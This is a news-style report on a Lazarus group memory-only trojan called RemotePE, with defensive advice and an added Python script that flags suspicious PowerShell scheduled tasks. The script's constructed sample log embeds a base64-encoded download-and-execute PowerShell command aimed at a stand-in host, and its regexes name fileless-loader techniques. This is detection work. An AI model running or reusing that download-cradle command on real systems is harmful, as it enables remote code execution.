The North Korean state-sponsored hacking group Lazarus has deployed a new memory-only remote access trojan (RAT) called RemotePE against financial institutions and cryptocurrency firms, according to cybersecurity researchers. The malware operates entirely in memory, leaving minimal forensic traces, and is designed to evade detection while exfiltrating sensitive data.
Key Details
RemotePE is a sophisticated tool that loads malicious code directly into a system’s memory without writing files to disk, making it difficult for traditional antivirus solutions to detect. The malware establishes persistence through scheduled tasks and injects itself into legitimate processes. Researchers note that Lazarus has used similar tactics in past attacks, including the hijacking of open-source projects to distribute malware.
Attack Methodology
The group reportedly gains initial access through spear-phishing emails or compromised software updates. Once inside a network, RemotePE enables remote control, data theft, and lateral movement. The malware specifically targets financial transaction systems and cryptocurrency wallets, aligning with Lazarus’s history of cybercriminal operations aimed at generating revenue for North Korea.
Defensive Recommendations
Security teams are advised to monitor for unusual memory patterns, implement application whitelisting, and restrict PowerShell usage. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has reportedly issued alerts to financial sector organizations about the new threat.
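As an added illustration of the monitoring advice above (example code, not from the researchers or any vendor), the Python below scans scheduled-task creation events (Windows Security event 4698, assumed to have been flattened to JSON lines by a log forwarder; the field names and the three sample events are constructed) and flags tasks whose action launches PowerShell with hidden, encoded or download-and-execute arguments, which is the launch pattern a memory-only loader persisting through scheduled tasks would leave behind. It also decodes any -EncodedCommand payload so that script-body indicators are checked, not just the launch line.

```python
import base64
import json
import re

# Constructed sample: three flattened Windows Security 4698 events, one JSON object per line.
SAMPLE_ENCODED = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/x')"
    .encode("utf-16le")).decode()
SAMPLE_LOG = "\n".join(json.dumps(e) for e in [
    {"event_id": 4698, "task_name": r"\Microsoft\Windows\Defrag\ScheduledDefrag",
     "author": "SYSTEM", "command": r"%windir%\system32\defrag.exe", "arguments": "-c -h -o -$"},
    {"event_id": 4698, "task_name": r"\OneDriveUpdate", "author": r"CORP\jdoe",
     "command": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "arguments": f"-NoP -W Hidden -Enc {SAMPLE_ENCODED}"},
    {"event_id": 4698, "task_name": r"\Backup\Nightly", "author": r"CORP\backupsvc",
     "command": "powershell.exe", "arguments": r"-ExecutionPolicy Bypass -File C:\Scripts\backup.ps1"},
])

POWERSHELL_HOST = re.compile(r"(?:^|\\)(?:powershell|pwsh)(?:\.exe)?$", re.I)  # bare name or full path
ENCODED_ARG = re.compile(r"(?<![\w-])-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{20,})", re.I)
# Launch-line and script-body patterns typical of fileless, memory-only loaders.
INDICATORS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "encoded_command": ENCODED_ARG,
    "invoke_expression": re.compile(r"\biex\b|invoke-expression", re.I),
    "inline_download": re.compile(r"downloadstring|downloaddata|invoke-webrequest|\biwr\b", re.I),
    "reflective_load": re.compile(r"reflection\.assembly\]::load|frombase64string", re.I),
}

def decode_encoded_command(arguments):
    """Plaintext of a -EncodedCommand argument (base64 of UTF-16LE), or '' if absent/invalid."""
    m = ENCODED_ARG.search(arguments)
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le") if m else ""
    except (ValueError, UnicodeDecodeError):
        return ""

def analyse_task(event):
    """Return a finding dict for one flattened 4698 event, or None when nothing fires."""
    if not POWERSHELL_HOST.search(event.get("command", "").strip('"')):
        return None
    args = event.get("arguments", "")
    text = args + "\n" + decode_encoded_command(args)  # launch line plus decoded script body
    hits = [name for name, rx in INDICATORS.items() if rx.search(text)]
    return {"task": event["task_name"], "author": event["author"], "indicators": hits} if hits else None

def scan(lines):
    # Run analyse_task over JSON-lines input; findings come back in log order.
    return [f for f in (analyse_task(json.loads(ln)) for ln in lines if ln.strip()) if f]
```

Against the sample log only the hidden, encoded OneDriveUpdate task is reported; the defrag task is not a PowerShell host and the file-based backup task trips no indicator, so a plain -File launch stays out of the alert queue.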
Context
Lazarus, also known as APT38, has been active since at least 2009 and is responsible for high-profile attacks including the 2014 Sony Pictures hack and the 2016 Bangladesh Bank heist. The group’s focus on cryptocurrency theft has intensified in recent years, with estimated losses exceeding $2 billion since 2018.